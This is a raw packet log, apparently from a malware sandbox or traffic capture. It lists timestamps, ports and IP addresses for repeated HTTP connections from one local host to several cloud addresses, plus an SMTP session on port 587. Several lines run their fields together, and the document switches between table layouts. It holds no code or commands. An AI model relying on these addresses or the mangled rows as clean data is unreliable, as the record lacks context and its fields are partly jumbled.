                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.775187016 CEST8050060165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.883388042 CEST5006180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.913645029 CEST5006280192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.919059992 CEST805006218.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.919133902 CEST5006280192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.919321060 CEST5006280192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.919321060 CEST5006280192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.924464941 CEST805006218.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.924503088 CEST805006218.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.956769943 CEST8050060165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.972832918 CEST5006380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.977718115 CEST805006354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.977802992 CEST5006380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.977911949 CEST5006380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.977926970 CEST5006380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.982729912 CEST805006354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.982738972 CEST805006354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.070473909 CEST5006080192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.711050034 CEST805006354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.711091995 CEST805006354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.711250067 CEST5006380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.711443901 CEST5006380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.716222048 CEST805006354.244.188.177192.168.2.5
Timestamp                             Src Port  Dst Port  Source IP       Dest IP
Oct 10, 2024 10:08:57.725930929 CEST  50051     80        192.168.2.5     208.100.26.245
Oct 10, 2024 10:08:57.726531982 CEST  50064     80        192.168.2.5     208.100.26.245
Oct 10, 2024 10:08:57.731235981 CEST  80        50051     208.100.26.245  192.168.2.5
Oct 10, 2024 10:08:57.731334925 CEST  50051     80        192.168.2.5     208.100.26.245
Oct 10, 2024 10:08:57.731770039 CEST  80        50064     208.100.26.245  192.168.2.5
Oct 10, 2024 10:08:57.731831074 CEST  50064     80        192.168.2.5     208.100.26.245
Oct 10, 2024 10:08:57.732062101 CEST  50064     80        192.168.2.5     208.100.26.245
Oct 10, 2024 10:08:57.732062101 CEST  50064     80        192.168.2.5     208.100.26.245
Oct 10, 2024 10:08:57.736920118 CEST  80        50064     208.100.26.245  192.168.2.5
Oct 10, 2024 10:08:57.736932039 CEST  80        50064     208.100.26.245  192.168.2.5
Oct 10, 2024 10:08:58.221935987 CEST  80        50064     208.100.26.245  192.168.2.5
Oct 10, 2024 10:08:58.232933044 CEST  50064     80        192.168.2.5     208.100.26.245
Oct 10, 2024 10:08:58.232963085 CEST  50064     80        192.168.2.5     208.100.26.245
Oct 10, 2024 10:08:58.237808943 CEST  80        50064     208.100.26.245  192.168.2.5
Oct 10, 2024 10:08:58.237831116 CEST  80        50064     208.100.26.245  192.168.2.5
Oct 10, 2024 10:08:58.266864061 CEST  80        50062     18.141.10.107   192.168.2.5
Oct 10, 2024 10:08:58.267007113 CEST  80        50062     18.141.10.107   192.168.2.5
Oct 10, 2024 10:08:58.267035961 CEST  50062     80        192.168.2.5     18.141.10.107
Oct 10, 2024 10:08:58.267056942 CEST  50062     80        192.168.2.5     18.141.10.107
Oct 10, 2024 10:08:58.271900892 CEST  80        50062     18.141.10.107   192.168.2.5
Oct 10, 2024 10:08:58.363440990 CEST  80        50064     208.100.26.245  192.168.2.5
Oct 10, 2024 10:08:58.460499048 CEST  51573     80        192.168.2.5     13.251.16.150
Oct 10, 2024 10:08:58.465434074 CEST  80        51573     13.251.16.150   192.168.2.5
Oct 10, 2024 10:08:58.468978882 CEST  51573     80        192.168.2.5     13.251.16.150
Oct 10, 2024 10:08:58.469113111 CEST  51573     80        192.168.2.5     13.251.16.150
Oct 10, 2024 10:08:58.469136000 CEST  51573     80        192.168.2.5     13.251.16.150
Oct 10, 2024 10:08:58.473932981 CEST  80        51573     13.251.16.150   192.168.2.5
Oct 10, 2024 10:08:58.473946095 CEST  80        51573     13.251.16.150   192.168.2.5
Oct 10, 2024 10:08:58.554846048 CEST  50064     80        192.168.2.5     208.100.26.245
Oct 10, 2024 10:08:58.897452116 CEST  51574     80        192.168.2.5     34.211.97.45
Oct 10, 2024 10:08:58.902282000 CEST  80        51574     34.211.97.45    192.168.2.5
Oct 10, 2024 10:08:58.902347088 CEST  51574     80        192.168.2.5     34.211.97.45
Oct 10, 2024 10:08:58.906064987 CEST  51574     80        192.168.2.5     34.211.97.45
Oct 10, 2024 10:08:58.906217098 CEST  51574     80        192.168.2.5     34.211.97.45
Oct 10, 2024 10:08:58.910895109 CEST  80        51574     34.211.97.45    192.168.2.5
Oct 10, 2024 10:08:58.911017895 CEST  80        51574     34.211.97.45    192.168.2.5
Oct 10, 2024 10:08:59.637713909 CEST  80        51574     34.211.97.45    192.168.2.5
Oct 10, 2024 10:08:59.637727976 CEST  80        51574     34.211.97.45    192.168.2.5
Oct 10, 2024 10:08:59.637799025 CEST  51574     80        192.168.2.5     34.211.97.45
Oct 10, 2024 10:08:59.639086008 CEST  51574     80        192.168.2.5     34.211.97.45
Oct 10, 2024 10:08:59.643996000 CEST  80        51574     34.211.97.45    192.168.2.5
Oct 10, 2024 10:08:59.662664890 CEST  51575     80        192.168.2.5     54.244.188.177
Oct 10, 2024 10:08:59.667543888 CEST  80        51575     54.244.188.177  192.168.2.5
Oct 10, 2024 10:08:59.667613029 CEST  51575     80        192.168.2.5     54.244.188.177
Oct 10, 2024 10:08:59.669430017 CEST  51575     80        192.168.2.5     54.244.188.177
Oct 10, 2024 10:08:59.669457912 CEST  51575     80        192.168.2.5     54.244.188.177
Oct 10, 2024 10:08:59.674240112 CEST  80        51575     54.244.188.177  192.168.2.5
Oct 10, 2024 10:08:59.674247980 CEST  80        51575     54.244.188.177  192.168.2.5
Oct 10, 2024 10:08:59.844531059 CEST  80        51573     13.251.16.150   192.168.2.5
Oct 10, 2024 10:08:59.845738888 CEST  80        51573     13.251.16.150   192.168.2.5
Oct 10, 2024 10:08:59.845793962 CEST  51573     80        192.168.2.5     13.251.16.150
Oct 10, 2024 10:08:59.863434076 CEST  51573     80        192.168.2.5     13.251.16.150
Oct 10, 2024 10:08:59.868230104 CEST  80        51573     13.251.16.150   192.168.2.5
Oct 10, 2024 10:09:00.396337032 CEST  80        51575     54.244.188.177  192.168.2.5
Oct 10, 2024 10:09:00.396434069 CEST  80        51575     54.244.188.177  192.168.2.5
Oct 10, 2024 10:09:00.396642923 CEST  51575     80        192.168.2.5     54.244.188.177
Oct 10, 2024 10:09:00.396719933 CEST  51575     80        192.168.2.5     54.244.188.177
Oct 10, 2024 10:09:00.401562929 CEST  80        51575     54.244.188.177  192.168.2.5
Oct 10, 2024 10:09:00.481199026 CEST  51576     80        192.168.2.5     18.141.10.107
Oct 10, 2024 10:09:00.486275911 CEST  80        51576     18.141.10.107   192.168.2.5
Oct 10, 2024 10:09:00.486361980 CEST  51576     80        192.168.2.5     18.141.10.107
Oct 10, 2024 10:09:00.486808062 CEST  51576     80        192.168.2.5     18.141.10.107
Oct 10, 2024 10:09:00.486835957 CEST  51576     80        192.168.2.5     18.141.10.107
Oct 10, 2024 10:09:00.491727114 CEST  80        51576     18.141.10.107   192.168.2.5
Oct 10, 2024 10:09:00.491930008 CEST  80        51576     18.141.10.107   192.168.2.5
Oct 10, 2024 10:09:00.657125950 CEST  51577     80        192.168.2.5     18.208.156.248
Oct 10, 2024 10:09:00.662064075 CEST  80        51577     18.208.156.248  192.168.2.5
Oct 10, 2024 10:09:00.664343119 CEST  51577     80        192.168.2.5     18.208.156.248
Oct 10, 2024 10:09:00.664510012 CEST  51577     80        192.168.2.5     18.208.156.248
Oct 10, 2024 10:09:00.664521933 CEST  51577     80        192.168.2.5     18.208.156.248
Oct 10, 2024 10:09:00.669372082 CEST  80        51577     18.208.156.248  192.168.2.5
Oct 10, 2024 10:09:00.669390917 CEST  80        51577     18.208.156.248  192.168.2.5
Oct 10, 2024 10:09:01.120738983 CEST  80        51577     18.208.156.248  192.168.2.5
Oct 10, 2024 10:09:01.120842934 CEST  80        51577     18.208.156.248  192.168.2.5
Oct 10, 2024 10:09:01.120939970 CEST  51577     80        192.168.2.5     18.208.156.248
Oct 10, 2024 10:09:01.121316910 CEST  51577     80        192.168.2.5     18.208.156.248
Oct 10, 2024 10:09:01.126082897 CEST  80        51577     18.208.156.248  192.168.2.5
Oct 10, 2024 10:09:01.680839062 CEST  51578     80        192.168.2.5     44.213.104.86
Oct 10, 2024 10:09:01.685987949 CEST  80        51578     44.213.104.86   192.168.2.5
Oct 10, 2024 10:09:01.686053038 CEST  51578     80        192.168.2.5     44.213.104.86
Oct 10, 2024 10:09:01.686340094 CEST  51578     80        192.168.2.5     44.213.104.86
Oct 10, 2024 10:09:01.686352015 CEST  51578     80        192.168.2.5     44.213.104.86
Oct 10, 2024 10:09:01.691251993 CEST  80        51578     44.213.104.86   192.168.2.5
Oct 10, 2024 10:09:01.691272020 CEST  80        51578     44.213.104.86   192.168.2.5
Oct 10, 2024 10:09:01.844518900 CEST  80        51576     18.141.10.107   192.168.2.5
Oct 10, 2024 10:09:01.844659090 CEST  51576     80        192.168.2.5     18.141.10.107
Oct 10, 2024 10:09:01.844675064 CEST  80        51576     18.141.10.107   192.168.2.5
Oct 10, 2024 10:09:01.844717979 CEST  51576     80        192.168.2.5     18.141.10.107
Oct 10, 2024 10:09:01.849490881 CEST  80        51576     18.141.10.107   192.168.2.5
Oct 10, 2024 10:09:01.857657909 CEST  51579     80        192.168.2.5     18.208.156.248
Oct 10, 2024 10:09:01.862554073 CEST  80        51579     18.208.156.248  192.168.2.5
Oct 10, 2024 10:09:01.862631083 CEST  51579     80        192.168.2.5     18.208.156.248
Oct 10, 2024 10:09:01.862725019 CEST  51579     80        192.168.2.5     18.208.156.248
Oct 10, 2024 10:09:01.862761974 CEST  51579     80        192.168.2.5     18.208.156.248
Oct 10, 2024 10:09:01.867682934 CEST  80        51579     18.208.156.248  192.168.2.5
Oct 10, 2024 10:09:01.867702961 CEST  80        51579     18.208.156.248  192.168.2.5
Oct 10, 2024 10:09:02.141824961 CEST  80        51578     44.213.104.86   192.168.2.5
Oct 10, 2024 10:09:02.141874075 CEST  80        51578     44.213.104.86   192.168.2.5
Oct 10, 2024 10:09:02.142047882 CEST  51578     80        192.168.2.5     44.213.104.86
Oct 10, 2024 10:09:02.142047882 CEST  51578     80        192.168.2.5     44.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.147008896 CEST805157844.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.348675013 CEST805157918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.348691940 CEST805157918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.349298000 CEST5157980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.357222080 CEST5157980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.362067938 CEST805157918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.376897097 CEST5158080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.381799936 CEST805158044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.381867886 CEST5158080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.382262945 CEST5158080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.382291079 CEST5158080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.387124062 CEST805158044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.387144089 CEST805158044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.848030090 CEST805158044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.848077059 CEST805158044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.848139048 CEST5158080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.861185074 CEST5158080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.865899086 CEST805158044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.198719978 CEST5158180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.203645945 CEST805158118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.205123901 CEST5158180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.226979017 CEST5158180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.227006912 CEST5158180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.231893063 CEST805158118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.231901884 CEST805158118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.495002985 CEST5158280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.499875069 CEST805158244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.500325918 CEST5158280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.500325918 CEST5158280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.500325918 CEST5158280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.505532980 CEST805158244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.505563974 CEST805158244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.963869095 CEST805158244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.964086056 CEST805158244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.964910030 CEST5158280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.964910030 CEST5158280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.969750881 CEST805158244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.563556910 CEST805158118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.563735962 CEST5158180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.564033031 CEST805158118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.564099073 CEST5158180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.568725109 CEST805158118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.587183952 CEST5158380192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.592125893 CEST805158344.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.592215061 CEST5158380192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.592341900 CEST5158380192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.592361927 CEST5158380192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.597160101 CEST805158344.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.597184896 CEST805158344.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.623435020 CEST5158480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.628393888 CEST805158454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.628453016 CEST5158480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.630541086 CEST5158480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.630645037 CEST5158480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.635351896 CEST805158454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.635436058 CEST805158454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.113225937 CEST805158344.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.113259077 CEST805158344.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.113287926 CEST805158344.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.113312960 CEST5158380192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.113352060 CEST5158380192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.115772963 CEST5158380192.168.2.544.213.104.86
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.122421980 CEST805158344.213.104.86192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.137356997 CEST5158580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.142240047 CEST805158518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.146133900 CEST5158580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.146370888 CEST5158580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.146370888 CEST5158580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.152558088 CEST805158518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.152586937 CEST805158518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.433844090 CEST805158454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.433862925 CEST805158454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.433872938 CEST805158454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.433936119 CEST5158480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.434124947 CEST5158480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.439378977 CEST805158454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.488140106 CEST805159134.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.488157988 CEST805159134.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.488214970 CEST5159180192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.488352060 CEST5159180192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.493136883 CEST805159134.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.501777887 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.503182888 CEST5159480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.507004976 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.508080959 CEST805159447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.511873960 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.512377977 CEST5159480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.512473106 CEST5159480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.512487888 CEST5159480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.517312050 CEST805159447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.517330885 CEST805159447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.689156055 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.689344883 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.694245100 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.871923923 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.872334003 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.877250910 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.030039072 CEST5159580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.034861088 CEST805159547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.035317898 CEST5159580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.035675049 CEST5159580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.035703897 CEST5159580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.040477991 CEST805159547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.040488958 CEST805159547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.040534973 CEST805159547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.040584087 CEST5159580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.043972015 CEST5159580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.045348883 CEST805159547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.048873901 CEST805159547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.064771891 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.064958096 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.066975117 CEST5159680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.069773912 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.071780920 CEST805159647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.071841955 CEST5159680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.073084116 CEST5159680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.073107004 CEST5159680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.076776028 CEST805159647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.076837063 CEST5159680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.076875925 CEST5159680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.077887058 CEST805159647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.077899933 CEST805159647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.081722021 CEST805159647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.081744909 CEST805159647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.250749111 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.251085043 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.255861998 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.439083099 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.439323902 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.444175005 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.514039040 CEST5159780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.518846989 CEST80515973.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.518904924 CEST5159780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.519200087 CEST5159780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.519222975 CEST5159780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.524318933 CEST80515973.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.524331093 CEST80515973.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.621376991 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.621696949 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.621777058 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.621807098 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.621859074 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.623454094 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.626609087 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.626665115 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.626669884 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.626719952 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.628361940 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.628401041 CEST5875159051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.628446102 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.628477097 CEST51590587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.628503084 CEST5875159051.195.88.199192.168.2.5
Timestamp                          Source Port  Dest Port  Source IP       Dest IP
Oct 10, 2024 10:09:10.628561020 CEST  51590        587        192.168.2.5     51.195.88.199
Oct 10, 2024 10:09:10.631443977 CEST  587          51590      51.195.88.199   192.168.2.5
